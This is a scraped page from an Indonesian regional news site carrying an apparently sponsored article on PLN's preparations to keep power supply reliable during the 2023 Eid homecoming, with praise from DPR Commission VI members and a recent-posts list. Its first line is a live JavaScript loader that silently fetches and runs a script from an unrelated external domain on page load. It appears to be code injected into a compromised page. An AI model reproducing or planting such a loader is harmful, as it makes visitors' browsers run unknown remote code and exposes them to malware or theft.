(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PLN UIP3B KALIMANTAN

Komisi VI DPR Apresiasi PLN Siapkan Listrik Masa Mudik 2023


KANALKALIMANTAN.COM, JAKARTA – Komisi VI DPR RI mengapresiasi langkah preventif PT PLN (Persero) dalam memastikan pasokan listrik yang andal dan aman selama momen mudik lebaran Idul Fitri tahun ini.

Anggota Komisi VI DPR RI Deddy Yevri Hanteru Sitorus mengapresiasi langkah PLN dalam memitigasi kebutuhan listrik. Kata dia, langkah PLN dalam mempersiapkan pasokan listrik berlapis menjadi kunci kesuksesan keandalan listrik pada momen lebaran tahun ini.

“Langkah PLN dalam memitigasi risiko ini paling penting dan sudah baik. Kami berharap tahun ini PLN bisa zero accident lagi,” ujar Deddy.

Sementara itu, Anggota Komisi VI DPR RI Muslim juga mengapresiasi hal yang sama. Ia mengatakan pemeliharaan yang sudah dilakukan jauh-jauh hari oleh PLN sebelum periode lebaran merupakan langkah strategis.

 

Baca juga: ‘Mimpi’ Kereta Api Konvensional Menguap, Kalsel Malah Ditawari Kereta Gantung dari Dubai

“Pelayanan hari ini juga sangat baik dan kami sangat bersyukur, keluhan masyarakat ini sangat cepat ditanggapi oleh PLN. PLN sangat cukup siap dalam memberikan pasokan listrik selama lebaran ini,” ujar Muslim.

Direktur Utama PLN Darmawan Prasodjo memastikan PLN akan menjaga pasokan listrik yang andal selama periode Lebaran tahun ini. PLN telah menyiapkan lebih dari 2.000 posko siaga kelistrikan yang siap melayani kebutuhan masyarakat.

“Kami juga menerjunkan 80 ribu lebih personil siaga yang juga siap melayani masyarakat. Saat ini seluruh pasokan listrik dalam posisi aman, seluruh kekuatan kami kerahkan untuk menjamin seluruh masyarakat bisa menyambut Idul Fitri dan kumpul keluarga pada momen tahun ini berjalan khidmat, aman dan nyaman,” tegas Darmawan.

Direktur Distribusi PLN Adi Priyanto menjelaskan dalam memastikan pasokan listrik yang aman pada libur lebaran tahun ini. Ia mengatakan, salah satunya adalah memastikan Hari Operasi Pembangkit (HOP) batu bara di atas 20 hari.

“Pasokan sistem kelistrikan nasional dalam kondisi aman. Kami juga melakukan pengamanan terhadap energi primer seperti batu bara, gas dan BBM dengan HOP yang mencukupi,” ujar Adi Priyanto dalam RDP bersama Komisi VI DPR RI, Selasa (11/4/2023).

Baca juga: Kini, Donor Darah Bisa Dilakukan di Qmall Banjarbaru Setiap Malam Minggu 

Adi juga menjelaskan PLN sudah melakukan banyak perbaikan dan peningkatan keandalan infrastruktur kelistrikan baik dari sisi instalasi pembangkit, transmisi dan juga distribusi. Pemeliharaan preventif telah dilakukan PLN sehingga Adi memastikan momen lebaran tahun ini tak akan ada pemeliharaan bergilir.

“Selanjutnya setiap unit operasional juga telah menyiapkan posko-posko siaga dilengkapi petugas dan perlengkapan. PLN siap memberikan pelayanan terbaik bagi masyarakat,” ujar Adi.

Adi juga mengatakan PLN juga siap mendukung para pemudik yang menggunakan kendaraan listrik. Seluruh infrastruktur charging station telah disiapkan oleh PLN dengan jumlah Stasiun Pengisian Kendaraan Listrik Umum (SPKLU) sebanyak 616 unit tersebar di 237 titik lokasi. PLN juga mengerahkan petugas di setiap titik charging station untuk bisa membantu masyarakat dalam mengisi daya kendaraannya. (Kanalkalimantan.com/adv)

Reporter : adv
Editor : kk


Risa

Recent Posts

Peringatan Isra Mikraj di PTAM Intan Banjar Diisi Tausiah oleh Habib Syauqi

KANALKALIMANTAN.COM, BANJARBARU – Peringatan Isra Mikraj Nabi Besar Muhammad SAW 1447 Hijriah, di aula kantor… Read More

3 jam ago

Drainase dan Sungai Tersumbat Perparah Banjir Rob di Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN — Wali Kota Banjarmasin, H Muhammad Yamin HR meninjau titik banjir rob upaya… Read More

5 jam ago

Jalan Sehat Bank Kalsel Bersama Warga dan ASN Pemkab HSU ‎

KANALKALIMANTAN.COM, AMUNTAI - Bertajuk "Jalan Sehat ASN Bangga Pakai QRIS" Bank Kalsel menggelar jalan santai… Read More

6 jam ago

Mengawal Kasus Pembunuhan Zahra Dilla Lewat Gerakan Udara Aksi Kamisan

KANALKALIMANTAN.COM, BANJARBARU — Social Justice Institute Kalimantan (SJIK) kembali mengingatkan kasus pembunuhan Zahra Dilla yang… Read More

7 jam ago

Bappenas Dukung Bangun Jalan Basarang–Batanjung 54 Km, Target Fungsional 2027

KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten (Pemkab) Kapuas mendapat dukungan pemerintah pusat dalam percepatan pembangunan… Read More

7 jam ago

Banjir Kalsel Bencana Ekologis, Wapres Gibran Sebut Ada Kesalahan Tata Ruang

KANALKALIMANTAN.COM, MARTAPURA - Wakil Presiden (Wapres) Gibran Rakabuming Raka meninjau langsung lokasi banjir di Kalimantan… Read More

11 jam ago

This website uses cookies.